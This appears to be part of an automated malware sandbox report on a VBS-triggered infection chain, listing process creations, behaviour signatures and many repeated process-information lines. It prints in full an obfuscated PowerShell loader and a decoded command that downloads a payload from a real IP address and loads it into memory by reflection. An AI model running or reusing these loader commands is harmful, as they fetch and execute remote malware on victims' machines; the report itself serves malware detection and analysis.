Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAC491D9F pushfd ; ret	13_2_00007FFAAC491FAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004567E0 push eax; ret	15_2_004567FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0045B9DD push esi; ret	15_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00455EAF push ecx; ret	15_2_00455EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433FF6 push ecx; ret	15_2_00434009

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW,

15_2_00406128

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Delayed program exit found

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
